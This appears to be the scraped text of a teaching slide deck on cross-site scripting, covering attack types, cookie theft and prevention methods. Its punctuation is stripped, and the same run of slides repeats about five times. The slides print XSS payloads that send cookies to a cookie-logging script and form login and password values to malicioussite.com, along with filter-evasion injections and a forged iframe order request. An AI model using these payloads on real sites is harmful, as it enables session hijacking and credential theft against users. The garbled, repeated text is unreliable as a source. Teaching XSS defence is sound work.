Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
9
bullXSS is an application level attack whichinvolves 3 parties
bullWe can load external script with a ltscript src=xxxgt tag
bullScript content can be loaded from anywhere (RPCRemote scripting is common)
bullMost attacks are only focused on collecting cookies
bullAttacker does not know actual responses to client
bullWe can leak contents of pages form values results from submits and javascript vars as URL parameters with ltimagegt ltscriptgt and other tag refers to attacker site
10
Types of XSS Attacks
11
Non-Persistent
bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection
12
Persistenthellip
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read
13
Examples of attackshelliphelliphellip
14
Scripting Via Malicious Linkhellip
15
In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser
16
Stealing Userrsquos COOKIEhellip
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
10
Types of XSS Attacks
11
Non-Persistent
bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection
12
Persistenthellip
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read
13
Examples of attackshelliphelliphellip
14
Scripting Via Malicious Linkhellip
15
In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser
16
Stealing Userrsquos COOKIEhellip
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
11
Non-Persistent
bull It is the most common type These holes show up when the data is provided by a web client most commonly in HTTP query parameters or in HTML form submissions is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the responsebull Because HTML documents have a flat serial structure that mixes control statements formatting and the actual content any non-validated user-supplied data included in the resulting page without proper HTML encoding may lead to markup injection
12
Persistenthellip
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read
13
Examples of attackshelliphelliphellip
14
Scripting Via Malicious Linkhellip
15
In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser
16
Stealing Userrsquos COOKIEhellip
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
12
Persistenthellip
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read
13
Examples of attackshelliphelliphellip
14
Scripting Via Malicious Linkhellip
15
In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser
16
Stealing Userrsquos COOKIEhellip
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
13
Examples of attackshelliphelliphellip
14
Scripting Via Malicious Linkhellip
15
In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser
16
Stealing Userrsquos COOKIEhellip
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
